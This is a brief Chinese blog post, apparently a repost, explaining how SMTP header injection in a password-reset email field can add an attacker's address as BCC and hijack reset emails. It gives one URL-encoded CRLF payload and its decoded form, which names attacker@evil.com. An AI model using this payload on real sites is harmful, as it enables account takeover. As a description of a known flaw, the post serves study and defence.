利用SMTP头注入劫持找回密码邮件

最新推荐文章于 2024-05-19 12:49:27 发布
最新推荐文章于 2024-05-19 12:49:27 发布
阅读量3.4k 收藏 1
点赞数 1
分类专栏: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/change518/article/details/80109387
版权

原Blog: http://blog.jr0ch17.com/2018/Please-email-me-your-password/

思路:
利用SMTP头注入,将攻击者email地址添加为CC或BCC,从而劫持到比如找回密码邮件(需要目标业务未对邮件地址做校验就发邮件,利用场景有限

Payload:
valid_user_address%40company.com%0D%0ABCC%3Ame%40me.com%0D%0A

解析后的结果是:

valid_user_address@company.com
BCC:attacker@evil.com
changetjut
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
IMAP/SMTP 注入
发哥微课堂
07-01 3877
0x00:介绍 IMAP 就是 Internet Mail Access Protocol 的缩写翻译来就是邮件访问协议,也就是用来收邮件的(和它类似的还有个 POP3,也是用来收邮件的)。SMTP 就是 Simple Mail Transfer Protocol 的缩写翻译来就是邮件传输协议,也就是用来发邮件的。 IMAP/SMTP 注入也就是收邮件邮件注入,有很多类似于这样的功能,例如...
窃取邮件内容 破解Email账号的三种方法(转)
08-12 3238
窃取邮件内容 破解Email账号的三种方法(转)[@more@]  电子邮件并不是安全的,在邮件的发送、传送和接收整个过程中的每个环节都可能存在薄弱环节,恶意用户如果利用其漏洞,就能够轻易的破解出账号,获得邮件内容。  一、利用...
SmtpClient发送邮件(用户找回密码)
happy664618843的专栏
09-17 3369
<br /> /// <summary> /// 利用.Net自带类(SmtpClient) 发送邮件 /// </summary> /// <param name="stmpserver">邮件服务器</param> /// <param name="username">用户名(邮箱名称)</param> /// <param name="pwd">密码</param> /// <param name="strfrom
Python 渗透测试:电子邮件 SMTP 协议 弱密码测试.(25端口)
最新发布
网络安全领域___专研者.
05-19 666
SMTP (Simple Mail Transfer Protocol) 是一种用于电子邮件传输的标准网络协议。它定义了电子邮件客户端和服务器之间如何进行通信和交换邮件信息。SMTP 协议爆破是一种利用 SMTP 协议漏洞进行密码破解的攻击方式。
注入电子邮件SMTP命令漏洞查找、注入、防止
08-21 3203
注入电子邮件】操纵电子邮件SMTP命令漏洞查找、注入、防止
【WEB安全】SMTP注入
weixin_43025534的博客
06-06 1452
SMTP是用于发送和传递电子邮件的协议,定义了邮件的传输方式和交流规则。SMTP注入是指可通过添加/控制邮件的方式,篡改邮件的发送者、抄送、密送等字段,从而达到欺骗、窃取邮件信息或劫持邮件传递的目的。既然归属到注入类,说明也是对用户输入未严格过滤,从而达到非预期的结果。邮件字段含义From邮件的发送者To邮件的主要接收者Cc邮件的抄送接收者Bcc邮件的密送接收者Subject邮件的主题或标题Body邮件的正文内容Date邮件的发送时间Reply-To。
hijack-email:流星应用程序的简单电子邮件劫持
05-06
在开发中劫持电子邮件。 安装 meteor add yp2:hijack-email 用法 要劫持电子邮件,请在您的应用设置中设置两个选项: { " hijackEmail " : true , " hijackEmailAddress " : " email.address.for.hijacked.emails@domain.com " } 在您的应用程序中,通过HijackEmail函数构建Email.send()选项对象, HijackEmail函数根据您的设置返回修改后的选项对象。 Email . send ( HijackEmail ( { from : 'foo@bar.com' , to : 'to@domain.com' , subject : 'Subject ' , text : 'Content' } ) )
Django实现发送邮件找回密码功能
09-18
开发者需要理解邮件发送的配置,以及验证码的生成与验证机制,这样才能为用户提供一个安全可靠的密码找回流程。记得在实际部署时,考虑到错误处理和用户体验,如发送失败的提示、验证码的有效期限制等。希望本文的...
php利用smtp发送邮件.zip_PHP邮件_php smtp_php利用smtp发送邮件_smtp
07-14
用php发送邮件,php发送邮件接口,需要自己改里面的配置文件
C#利用QQ邮箱找回用户密码共3页.pdf.zip
10-29
【标题】:“C#利用QQ邮箱找回用户密码共3页.pdf.zip”是一个关于使用C#编程语言通过QQ邮箱实现用户密码找回功能的教程压缩文件,包含3页详细内容。 【描述】:该压缩包内含的PDF文档详细阐述了如何在C#应用程序中...
php利用smtp发送邮件
09-26
这是利用smtp服务器发送邮件的一个类,经过测试可用,如果不太了解使用方法,可参考我的博客文章进行使用。
springboot qq邮箱找回密码
07-22
springboot qq邮箱找回密码,压缩包内提供了sql,工具类可以删除
利用SMTP协议发送电子邮件支持附件
06-19
本文将详细介绍如何利用SMTP(Simple Mail Transfer Protocol)协议在Visual C++中实现邮件发送,并支持添加附件。 首先,SMTP是互联网上用于传输电子邮件的标准协议。它规定了邮件服务器之间交换邮件的规则,允许...
简单讲述SMTP 电子邮件标题注入
Swee
08-06 1667
这部分漏洞不方便搭建复现环境,故在此文中我们便不用实例介绍了。 首先是老生常谈的开 什么是电子邮件标题注入? 通常的做法是网站实施联系表单,反过来将合法用户的电子邮件发送给消息的预期收件人。大多数情况下,这样的联系表单将设置SMTPFrom,Reply-to以便让收件人轻松处理联系表单中的通信,就像其他电子邮件一样。 邮件服务器注入技术也是通过一个对用户提供的数据没有严格检查的webmail应用程序将IMAP命令或者SMTP命令注入邮件服务器。要向邮件服务器注入命令,前提条件是允许用户通过w
一些基础漏洞利用
m0re's blog
07-23 1723
前言: 继续进行漏洞的学习利用。 接上学到smtp服务。 本文目录smtp服务漏洞利用smtp暴力破解rpcbind漏洞利用 smtp服务漏洞利用 smtp暴力破解 一、smtp版本信息获取 使用metasploit中的smtp-version模块探测smtp服务的版本信息,目标:129.121.22.119 msfconsole use auxiliary/scanner/smtp/smtp_version set rhosts 129.121.22.119 # 期间可以使用命令“show options
8、弱口令漏洞复现
sigali的博客
03-17 1145
8、弱口令漏洞复现 弱口令(weak password) 没有严格和准确的定义,通常认为容易被别人(他们有可能对你很了解)猜测到或被破解工具破解的口令均为弱口令。弱口令指的是仅包含简单数字和字母的口令,例如“123”、“abc”等,因为这样的口令很容易被别人破解,从而使用户的互联网账号受到他人控制,因此不推荐用户使用。 我们使用DVWA靶场进行测试。 安全等级:LOW 在Brute Force模块进行测试弱口令: 用户名和密码随便填写一个,然后使用burp抓包。,然后发送到Intruder模块。 进入到
Exchange 2013匿名中继被劫持,不断发送垃圾邮件
有技术的机械师
07-24 5925
24.去除匿名中继的权限(去除仿冒内部邮件地址) ========== Get-ReceiveConnector "Internet Receive Connector" | Remove-ADPermission -User "NT AUTHORITY\ANONYMOUS LOGON" -ExtendedRights "Ms-Exch-SMTP-Accept-Any-Recipient"
关于伪造邮件的攻与防
gscaiyucheng的专栏
03-25 7236
我先声明: 以下知识以学习为目的. 请不要用来犯罪. 否则造成的风险由滥用者个人自行承担. 一.邮件服务提供商的攻与防 smtp协议算是相当透明的一个协议,作为邮件发送者可以指定SMTP发送者的发送账户、发送账户的显示名称、SMTP服务器域名等信息,如果接受端未对这些信息进行认证,就可能放过一些刻意伪造的邮件。 但是,现在的邮件服务器都有黑名单和反向认证等机制,如检查邮件来源IP、检查邮
如何提高SMTP邮件的安全性?从而不被黑客窃听
w3cschools的博客
11-20 4689
简单邮件传输协议(SMTP)用于在邮件服务器之间进行邮件传输,并且传统上是不安全的,因此容易被黑客窃听。命名实体的基于DNS的认证(国家统计局)用于SMTP提供了邮件传输更安全的方法,并逐渐变得越来越流行。 在这篇文章中,我们将讨论与SMTP相关的风险以及DANE如何克服这些风险,并为您提供Internet.nl向那些在实施DANE时照顾邮件服务器的人建议的技巧。 关键点: 即使安装了STA...
利用VC6实现SMTP协议的邮件发送实验
本实验文档涉及的是计算机网络实验中的SMTP邮件发送系统socket编程实践,针对的是学生如何在Windows7环境下利用Visual C++ 6(VC6)开发工具进行邮件客户端的实现。SMTP(Simple Mail Transfer Protocol)是一种用于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值